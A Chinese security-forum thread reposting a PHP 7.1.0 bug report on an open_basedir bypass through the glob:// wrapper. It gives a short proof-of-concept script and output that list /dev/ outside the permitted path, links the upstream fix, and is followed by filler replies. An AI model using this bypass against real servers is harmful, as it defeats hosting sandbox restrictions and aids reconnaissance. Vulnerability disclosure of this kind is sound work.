90_ 发表于 2017-1-11 12:02:50

PHP 7.1.0 and prior open_basedir bypass through glob wrapper Vulnerability

# ./php -v
PHP 7.1.0 (cli) (built: Dec 23 2016 16:08:30) ( NTS DEBUG )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies


Test script:
---------------
<?php
if ($dh = opendir($argv)) {
while (($file = readdir($dh)) !== false) {
echo "$file\n";
}
closedir($dh);
}


Expected result:
----------------
Warning: opendir(): open_basedir restriction in effect. File(/dev/) is
not within the allowed path(s): (/virtual/) in
/virtual/php/71/bin/bypass.php on line 2

Warning: opendir(/dev/): failed to open dir: Operation not permitted in
/virtual/php/71/bin/bypass.php on line 2

Actual result:
--------------
# ./php bypass.php "/dev/"

Warning: opendir(): open_basedir restriction in effect. File(/dev/) is
not within the allowed path(s): (/virtual/) in
/virtual/php/71/bin/bypass.php on line 2

Warning: opendir(/dev/): failed to open dir: Operation not permitted in
/virtual/php/71/bin/bypass.php on line 2
# ./php bypass.php "glob:///dev/*"
MAKEDEV
apm
apmctl
arandom
audio
audio0
audio1



References:

https://github.com/php/php-src/commit/7e49e8e7970b423968de7a53ea9a0796f4634276

arctic 发表于 2017-1-11 13:02:26

Lucifer 发表于 2017-1-11 13:19:33

支持,看起来还是可以的

云游者 发表于 2017-1-11 14:03:20

我是来水经验的……

a136 发表于 2017-1-11 14:14:06

支持中国红客联盟(ihonker.org)

若冰 发表于 2017-1-11 15:04:06

我是来水经验的……

HUC-参谋长 发表于 2017-1-11 15:57:42

非常感谢

wanmznh 发表于 2017-1-11 16:24:56

Micah 发表于 2017-1-11 16:30:10

支持,看起来还是可以的

小龙 发表于 2017-1-11 17:25:03

我是来水经验的……
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: PHP 7.1.0 and prior open_basedir bypass through glob wrapper Vulnerability